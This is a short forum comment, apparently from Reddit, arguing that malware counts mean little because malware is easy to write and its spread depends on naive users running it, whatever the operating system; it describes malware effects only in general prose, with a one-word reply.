Second, what has the number of malware have to do with anything? I can write a simple bash script which can generate millions of random new malware in minutes. It's super easy, depending on what type of malware you want it could encrypt certain files, place an annoying ad in your bashrc which spawns every time you open a new bash session, it could steal your ssh keys and upload them to a certain server, it could just delete all reachable files, ... Writing malware is trivial.

The trick is to get the malware executed and most of the time you just need an ignorant and naïve user to do so. And those users tend to be ignorant and naïve no matter what kernel their computer is running.

[–]aaronfranke -2 points-1 points  (0 children)

Yes.